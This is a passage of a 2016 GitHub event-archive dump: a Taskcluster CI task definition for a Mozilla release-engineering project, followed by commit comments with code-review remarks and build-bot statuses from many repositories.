\\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"2149d5ac7a1dc167892552ade57e1e8bec490f1c\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:45:00.293Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:45:00.293Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"cewceEfSSlGZUz5a2sklRw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:45:00.293Z\\\"\\n}\\n  time:     2016-09-23T12:45:00.521Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"DmMdPN1XQqiqaHleX6UgvA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"2149d5ac7a1dc167892552ade57e1e8bec490f1c\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:45:00.293Z\",\n                    \"deadline\": \"2016-09-24T12:45:00.293Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"cewceEfSSlGZUz5a2sklRw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:45:00.293Z\"\n                },\n                \"time\": \"2016-09-23T12:45:00.521Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-23T12:45:00Z"}
{"id":"4608331110","type":"CommitCommentEvent","actor":{"login":"IncarVishnu"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19145624,"position":null,"line":null,"path":null,"commit_id":"8fd6ace2fa6650c6ca597d65217d123b7d9036a7","created_at":"2016-09-23T12:45:12Z","updated_at":"2016-09-23T12:45:12Z","body":"Im head funktioniert glaub ich nicht. Man sollte das ganze im JavaScript vorladen und die Anwendung erst dann starten. Sollte irgendwas nicht geladen werden können, kann man darauf reagieren und zeigt dem Nutzer nicht einfach einen weißen Bildschirm.\r\nVielleicht eine zentrale Stelle finden, wo es passt.\r\n\r\nVG Daniel"}},"created_at":"2016-09-23T12:45:12Z"}
{"id":"4608331314","type":"CommitCommentEvent","actor":{"login":"jbarnoud"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":19145625,"position":42,"line":101,"path":"package/MDAnalysis/topology/GROParser.py","commit_id":"1524f75248e30afcc9b3d8ff9d99555bffb9bf18","created_at":"2016-09-23T12:45:14Z","updated_at":"2016-09-23T12:45:14Z","body":"While I see your point, doesn't make it more difficult to implement what we discussed in #598?"}},"created_at":"2016-09-23T12:45:14Z"}
{"id":"4608331842","type":"CommitCommentEvent","actor":{"login":"tachyons"},"repo":{"name":"snapcore/snapcraft"},"payload":{"comment":{"id":19145629,"position":33,"line":33,"path":"snapcraft/internal/indicators.py","commit_id":"c2567270d7bcd3b44a329972748e56cffce587cf","created_at":"2016-09-23T12:45:20Z","updated_at":"2016-09-23T12:45:20Z","body":"This approach of finding content length using content length header is making probelm when using http compression \r\nEg github gist"}},"created_at":"2016-09-23T12:45:20Z"}
{"id":"4608332472","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITAS-IServices"},"payload":{"comment":{"id":19145631,"position":null,"line":null,"path":null,"commit_id":"99715038d9ec97bba855d8060e636cac71bb21c1","created_at":"2016-09-23T12:45:28Z","updated_at":"2016-09-23T12:45:28Z","body":"__API Description file syntax error on line 346__: base type 'ServiceResponseDetail' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-23T12:45:28Z"}
{"id":"4608339891","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19145644,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T12:47:08Z","updated_at":"2016-09-23T12:47:08Z","body":"What's the overall effect on the size of the Android libselinux after this change?\r\nDoesn't this bring in many functions that are completely unneeded on Android?"}},"created_at":"2016-09-23T12:47:08Z"}
{"id":"4608340834","type":"CommitCommentEvent","actor":{"login":"ricardokleinklein"},"repo":{"name":"ricardokleinklein/Robotics"},"payload":{"comment":{"id":19145645,"position":null,"line":null,"path":null,"commit_id":"23b103432e9e700bf2888d39b7db2ea775862152","created_at":"2016-09-23T12:47:20Z","updated_at":"2016-09-23T12:47:20Z","body":"Undo?"}},"created_at":"2016-09-23T12:47:20Z"}
{"id":"4608340991","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19145646,"position":null,"line":null,"path":null,"commit_id":"ac0d4e7748e0135ff367bc55e1132cbee7f2cc14","created_at":"2016-09-23T12:47:22Z","updated_at":"2016-09-23T12:47:22Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T12:47:22Z"}
{"id":"4608341479","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITAS-IServices"},"payload":{"comment":{"id":19145649,"position":null,"line":null,"path":null,"commit_id":"603239fef8f7b2d5ea5df8fd4034d0fc87cd044f","created_at":"2016-09-23T12:47:28Z","updated_at":"2016-09-23T12:47:28Z","body":"__API Description file syntax error on line 54__: base type '404 ServiveResponse' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-23T12:47:28Z"}
{"id":"4608348218","type":"CommitCommentEvent","actor":{"login":"meghprkh"},"repo":{"name":"felicity-buzz-2k16/buzz2k16-main-website"},"payload":{"comment":{"id":19145666,"position":null,"line":null,"path":null,"commit_id":"032a9b8b5ecf07939b9f80844ecb08abb0f0e74c","created_at":"2016-09-23T12:48:56Z","updated_at":"2016-09-23T12:48:56Z","body":"That was not the only thing. You need to disable compression in exporting\nthe tilemap in map properties.\n\nRegards,\nMegh Parikh\n\nOn 23-Sep-2016 17:29, \"Pranav Nair\" <notifications@github.com> wrote:\n\n> Had done this in another directory, uploaded the wrong one, sorry :/\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/felicity-buzz-2k16/buzz2k16-main-website/commit/032a9b8b5ecf07939b9f80844ecb08abb0f0e74c#commitcomment-19145133>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFs91Q7HkuxYLh19tceZa7LMzfDjngw-ks5qs78IgaJpZM4KE5q8>\n> .\n>\n"}},"created_at":"2016-09-23T12:48:56Z"}
{"id":"4608350567","type":"CommitCommentEvent","actor":{"login":"fjukstad"},"repo":{"name":"3inar/nowaclean"},"payload":{"comment":{"id":19145671,"position":5,"line":106,"path":"R/preprocessing.R","commit_id":"f48f5039ef910ef3afa99f6ccab0f95d30935d74","created_at":"2016-09-23T12:49:28Z","updated_at":"2016-09-23T12:49:28Z","body":"![sorry.gif](http://i.imgur.com/DedE2RZ.gif) "}},"created_at":"2016-09-23T12:49:28Z"}
{"id":"4608355090","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":19145685,"position":42,"line":101,"path":"package/MDAnalysis/topology/GROParser.py","commit_id":"1524f75248e30afcc9b3d8ff9d99555bffb9bf18","created_at":"2016-09-23T12:50:27Z","updated_at":"2016-09-23T12:50:27Z","body":"As long as the kwargs to Universe get passed along to the Parser, it should still work the same.\r\n\r\nMoving things to the base class will mostly avoid repetition in individual implementations.  If after we've got this merged we see a way to generalise guessing into the base class we can go for it - I'm mostly just trying to reproduce old behaviour wrt guessing."}},"created_at":"2016-09-23T12:50:27Z"}
{"id":"4608363251","type":"CommitCommentEvent","actor":{"login":"mnmelo"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":19145696,"position":42,"line":101,"path":"package/MDAnalysis/topology/GROParser.py","commit_id":"1524f75248e30afcc9b3d8ff9d99555bffb9bf18","created_at":"2016-09-23T12:52:16Z","updated_at":"2016-09-23T12:52:16Z","body":"I agree with the practicality of doing it this way for now, but I think centralization and normalization should be a future goal nonetheless."}},"created_at":"2016-09-23T12:52:16Z"}
{"id":"4608365156","type":"CommitCommentEvent","actor":{"login":"uxmatter"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19145700,"position":null,"line":null,"path":null,"commit_id":"8325f6444970559e465d71df625e81cbe57c0b85","created_at":"2016-09-23T12:52:43Z","updated_at":"2016-09-23T12:52:43Z","body":"您好！是否能提供Sketch等设计素材"}},"created_at":"2016-09-23T12:52:43Z"}
{"id":"4608368984","type":"CommitCommentEvent","actor":{"login":"dmlloyd"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":19145733,"position":13,"line":1236,"path":"host-controller/src/main/java/org/jboss/as/host/controller/DomainModelControllerService.java","commit_id":"fbc1ac51d1dd57cc00abdbc09306623347b9e7dc","created_at":"2016-09-23T12:53:31Z","updated_at":"2016-09-23T12:53:31Z","body":"What other error might be thrown here?"}},"created_at":"2016-09-23T12:53:31Z"}
{"id":"4608371018","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19145738,"position":null,"line":null,"path":null,"commit_id":"a855ddba57e7c75adbbd9fabcb0c490446e788fe","created_at":"2016-09-23T12:53:58Z","updated_at":"2016-09-23T12:53:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1144](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14111&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T12:53:58Z"}
{"id":"4608372619","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19145741,"position":null,"line":null,"path":null,"commit_id":"ac0d4e7748e0135ff367bc55e1132cbee7f2cc14","created_at":"2016-09-23T12:54:17Z","updated_at":"2016-09-23T12:54:17Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T12:54:17Z"}
{"id":"4608377247","type":"CommitCommentEvent","actor":{"login":"natalia-osa"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19145754,"position":7,"line":42,"path":"MapView/Map/NSURLSession+RMUserAgent.m","commit_id":"81a22846d49ff6e4ce0158d7fb86a50f3c448371","created_at":"2016-09-23T12:55:18Z","updated_at":"2016-09-23T12:55:18Z","body":"I don't expect this to ever fire. Just a sanity check, if something gets really bad, then this code will cancel it. Please notice, that the semaphore waits 10s longer than the task's timeout. So the task should end before this. I'll add an error here anyway :)."}},"created_at":"2016-09-23T12:55:18Z"}
{"id":"4608379725","type":"CommitCommentEvent","actor":{"login":"keymon"},"repo":{"name":"alphagov/paas-bootstrap"},"payload":{"comment":{"id":19145757,"position":70,"line":70,"path":"concourse/pipelines/destroy.yml","commit_id":"3e2fe543258100e2ddbbeace48f34b18609a9803","created_at":"2016-09-23T12:55:50Z","updated_at":"2016-09-23T12:55:50Z","body":"Do we need this?"}},"created_at":"2016-09-23T12:55:50Z"}
{"id":"4608385763","type":"CommitCommentEvent","actor":{"login":"dmlloyd"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":19145776,"position":26,"line":1512,"path":"pom.xml","commit_id":"44aca3e92c3c73996d6155fb8d8028d3510c5f08","created_at":"2016-09-23T12:57:08Z","updated_at":"2016-09-23T12:57:08Z","body":"I think we'd better at least add a comment before this item to point out that this list is dynamic and subject to change over time and even between JDK releases.  Also it might be a good idea to identify which of our modules requires each of these exports if that info is available; this might help debugging future problems."}},"created_at":"2016-09-23T12:57:08Z"}
{"id":"4608392707","type":"CommitCommentEvent","actor":{"login":"bartoszkp"},"repo":{"name":"bartoszkp/TDDEvaluation"},"payload":{"comment":{"id":19145790,"position":5,"line":44,"path":"SignalsIntegrationTests/SignalsIntegrationTests/SignalsIntegrationTests.csproj","commit_id":"2c5177f191a14b1e8a06d450bd7623599a4c892c","created_at":"2016-09-23T12:58:30Z","updated_at":"2016-09-23T12:58:30Z","body":"You're right, thanks. I'll fix it on Monday - reverting the change is not enough, a separate directory for DLL dependencies should be created.\r\n"}},"created_at":"2016-09-23T12:58:30Z"}
{"id":"4608393532","type":"CommitCommentEvent","actor":{"login":"mmalte"},"repo":{"name":"ffac/site"},"payload":{"comment":{"id":19145791,"position":null,"line":null,"path":null,"commit_id":"865bef97294aa3c22f4d89b5be08b938b317cb6d","created_at":"2016-09-23T12:58:40Z","updated_at":"2016-09-23T12:58:40Z","body":"We are switching from openwrt to lede, do you know if this would still be the right choice?"}},"created_at":"2016-09-23T12:58:40Z"}
{"id":"4608396264","type":"CommitCommentEvent","actor":{"login":"npmccallum"},"repo":{"name":"Hughsonz/jose"},"payload":{"comment":{"id":19145797,"position":null,"line":null,"path":null,"commit_id":"f994ca95a3de0a833abc6d01131f0b66bed31b7e","created_at":"2016-09-23T12:59:14Z","updated_at":"2016-09-23T12:59:14Z","body":"You need jansson 2.9. https://copr.fedorainfracloud.org/coprs/npmccallum/jansson/"}},"created_at":"2016-09-23T12:59:14Z"}
{"id":"4608397004","type":"CommitCommentEvent","actor":{"login":"SiMet"},"repo":{"name":"openconnectivityfoundation/core"},"payload":{"comment":{"id":19145801,"position":10,"line":18,"path":"schemas/oic.wk.res-schema.json","commit_id":"ded74dec1598875d8eb3dd9cffe8647f5efdd6c5","created_at":"2016-09-23T12:59:24Z","updated_at":"2016-09-23T12:59:24Z","body":"It's look like bad merge"}},"created_at":"2016-09-23T12:59:24Z"}
{"id":"4608398291","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19145802,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T12:59:41Z","updated_at":"2016-09-23T12:59:41Z","body":"On 23 September 2016 at 13:17, Dominic König <notifications@github.com>\nwrote:\n\n> Nope - this would allow anonymous users to approve everything.\n>\n\nOnly if they can access the API function.\n\nCurrently there is no check within this function that a user had the\ncorrect permissions, so this isn't really the correct place to do such a\ncheck for logged-in or not tbh\n\nEither this function needs protecting or we assume it's caller does\nthat...not half & half\n\nF\n"}},"created_at":"2016-09-23T12:59:41Z"}
{"id":"4608400057","type":"CommitCommentEvent","actor":{"login":"kba"},"repo":{"name":"UB-Mannheim/hocr-tools"},"payload":{"comment":{"id":19145808,"position":null,"line":null,"path":null,"commit_id":"a709b94c4fa120f19b47c4470a0646468ac17ba4","created_at":"2016-09-23T13:00:04Z","updated_at":"2016-09-23T13:00:04Z","body":"Nice pun :) [tsht](https://github.com/kba/tsht) not a special shell, scripts are run in a bash shell with some pre-defined shell functions for testing, hooks to run and possibly extensions (= additional software). I ususally run the tests with `PATH=$PWD:$PATH ./test/tsht [path-to-test.tsht...]`."}},"created_at":"2016-09-23T13:00:04Z"}
{"id":"4608400238","type":"CommitCommentEvent","actor":{"login":"hwuerz"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19145809,"position":14,"line":14,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-23T13:00:06Z","updated_at":"2016-09-23T13:00:06Z","body":"Das hört sich spannend an. Sollten sich Fragen ergeben melde ich mich, vielen Danke für das Angebot."}},"created_at":"2016-09-23T13:00:06Z"}
{"id":"4608413006","type":"CommitCommentEvent","actor":{"login":"stephanlukasczyk"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19145833,"position":19,"line":19,"path":"code/modules/Lemmatizer.py","commit_id":"cbb1b09ae30c726c60a7fc9de36f465a59a90bdb","created_at":"2016-09-23T13:02:35Z","updated_at":"2016-09-23T13:02:35Z","body":"I changed it on commit acf423f because the article reads to me the way as my original suggestion was."}},"created_at":"2016-09-23T13:02:35Z"}
{"id":"4608416822","type":"CommitCommentEvent","actor":{"login":"Maurixrs"},"repo":{"name":"mln6666/PSHP2016"},"payload":{"comment":{"id":19145844,"position":null,"line":null,"path":null,"commit_id":"b094a6ecd69d3cd99b0f5cc7c5a2c60e97cb0042","created_at":"2016-09-23T13:03:22Z","updated_at":"2016-09-23T13:03:22Z","body":"Good commit Mario! "}},"created_at":"2016-09-23T13:03:22Z"}
{"id":"4608419830","type":"CommitCommentEvent","actor":{"login":"brnikita"},"repo":{"name":"soshace/EOP-2"},"payload":{"comment":{"id":19145850,"position":4,"line":4,"path":"file_upload.js","commit_id":"e5a15a48c29f23f3263600a243953829a513f55e","created_at":"2016-09-23T13:03:58Z","updated_at":"2016-09-23T13:03:58Z","body":"Не экономьте на названиях переменных. Пишите request, callback. Все равно минификатор используется, а читать проще будет."}},"created_at":"2016-09-23T13:03:58Z"}
{"id":"4608421687","type":"CommitCommentEvent","actor":{"login":"rao1219"},"repo":{"name":"rao1219/homework"},"payload":{"comment":{"id":19145855,"position":24,"line":24,"path":"ProducerComsumer/Buffer.java","commit_id":"82a1556ffa1f529f422775d581b98ede8ee8f619","created_at":"2016-09-23T13:04:21Z","updated_at":"2016-09-23T13:04:21Z","body":"@rainto96 @qingping95"}},"created_at":"2016-09-23T13:04:21Z"}
{"id":"4608428413","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19145864,"position":null,"line":null,"path":null,"commit_id":"a855ddba57e7c75adbbd9fabcb0c490446e788fe","created_at":"2016-09-23T13:05:42Z","updated_at":"2016-09-23T13:05:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1144](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14111&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:11:45"}},"created_at":"2016-09-23T13:05:42Z"}
{"id":"4608429030","type":"CommitCommentEvent","actor":{"login":"Horteppa"},"repo":{"name":"Horteppa/harry"},"payload":{"comment":{"id":19145868,"position":null,"line":null,"path":null,"commit_id":"f9bb4afb7682b93db7b5b74ec560c55a2d3495e3","created_at":"2016-09-23T13:05:50Z","updated_at":"2016-09-23T13:05:50Z","body":"first commit 23/09/2016"}},"created_at":"2016-09-23T13:05:50Z"}
{"id":"4608429612","type":"CommitCommentEvent","actor":{"login":"brianhelba"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19145869,"position":22,"line":84,"path":"girder/models/upload.py","commit_id":"5d00b84ee7d9a196bd53afb04eef95f976ae1040","created_at":"2016-09-23T13:05:57Z","updated_at":"2016-09-23T13:05:57Z","body":"`itemId`, not `itemID`"}},"created_at":"2016-09-23T13:05:57Z"}
{"id":"4608431790","type":"CommitCommentEvent","actor":{"login":"webdevium"},"repo":{"name":"Vladnev/Laravel"},"payload":{"comment":{"id":19145870,"position":38,"line":38,"path":"app/UserFunc.php","commit_id":"f5c6c10867aabca89cb2c8ccfd9f4cdc4eefa3cb","created_at":"2016-09-23T13:06:21Z","updated_at":"2016-09-23T13:06:21Z","body":"Судя по [документации для метода `->attempt()`](https://github.com/laravel/framework/blob/5.3/src/Illuminate/Auth/SessionGuard.php#L351) нужно передавать булевое значение."}},"created_at":"2016-09-23T13:06:21Z"}
{"id":"4608431860","type":"CommitCommentEvent","actor":{"login":"brianhelba"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19145871,"position":64,"line":314,"path":"girder/models/upload.py","commit_id":"5d00b84ee7d9a196bd53afb04eef95f976ae1040","created_at":"2016-09-23T13:06:22Z","updated_at":"2016-09-23T13:06:22Z","body":"Same. "}},"created_at":"2016-09-23T13:06:22Z"}
{"id":"4608432188","type":"CommitCommentEvent","actor":{"login":"Wmb962"},"repo":{"name":"Wmb962/Demo3"},"payload":{"comment":{"id":19145872,"position":2,"line":2,"path":"README.md","commit_id":"48112072a9b61eeff6238a36ec1eae85c3e201b8","created_at":"2016-09-23T13:06:26Z","updated_at":"2016-09-23T13:06:26Z","body":"![1](https://cloud.githubusercontent.com/assets/21220798/18786613/6ac1ba1a-81d1-11e6-9f6c-8cf2c3c6f912.png)\r\n![2](https://cloud.githubusercontent.com/assets/2\r\n![2](https://cloud.githubusercontent.com/assets/21220798/18786644/90b76df0-81d1-11e6-9eb8-79f4bbf44a5f.png)\r\n1220798/18786618/6f32a442-81d1-11e6-8d93-269c1775a825.png)\r\n\r\n"}},"created_at":"2016-09-23T13:06:26Z"}
{"id":"4608440137","type":"CommitCommentEvent","actor":{"login":"Wmb962"},"repo":{"name":"Wmb962/Demo3"},"payload":{"comment":{"id":19145889,"position":null,"line":null,"path":null,"commit_id":"48112072a9b61eeff6238a36ec1eae85c3e201b8","created_at":"2016-09-23T13:08:07Z","updated_at":"2016-09-23T13:08:07Z","body":"2"}},"created_at":"2016-09-23T13:08:07Z"}
{"id":"4608440266","type":"CommitCommentEvent","actor":{"login":"aaronwolen"},"repo":{"name":"aaronwolen/mjbtramp"},"payload":{"comment":{"id":19145891,"position":null,"line":null,"path":null,"commit_id":"1e15715ff8baa07ba8654a3ed987c081469b7543","created_at":"2016-09-23T13:08:09Z","updated_at":"2016-09-23T13:08:09Z","body":"Cool, you're in! It's just a small project to liberate some data from messy excel files, thought it would make a good test case for using CI in an analysis. Feel free to make suggestions."}},"created_at":"2016-09-23T13:08:09Z"}
{"id":"4608441454","type":"CommitCommentEvent","actor":{"login":"brnikita"},"repo":{"name":"soshace/EOP-2"},"payload":{"comment":{"id":19145892,"position":20,"line":20,"path":"public/js/components/UserAdd.jsx","commit_id":"4ce3aa926f05aba4c6e9217b6b042fd00bac5eac","created_at":"2016-09-23T13:08:24Z","updated_at":"2016-09-23T13:08:24Z","body":"Здесь else лишнее\r\nif (length > 8) {\r\n  return 'success';\r\n}\r\nif (length > 4) {\r\n   return 'warning';\r\n}\r\nif (length > 0) {\r\n  return 'error';\r\n}"}},"created_at":"2016-09-23T13:08:24Z"}
{"id":"4608441798","type":"CommitCommentEvent","actor":{"login":"zharkovav"},"repo":{"name":"zharkovav/coala"},"payload":{"comment":{"id":19145893,"position":17,"line":192,"path":"coalib/settings/ConfigurationGathering.py","commit_id":"4c9ad30140e5b9589f8318b8b8c6edef8cd3a953","created_at":"2016-09-23T13:08:28Z","updated_at":"2016-09-23T13:08:28Z","body":"You mean some other options in cli_section, like \"show_bears\"? If so, i think yes."}},"created_at":"2016-09-23T13:08:28Z"}
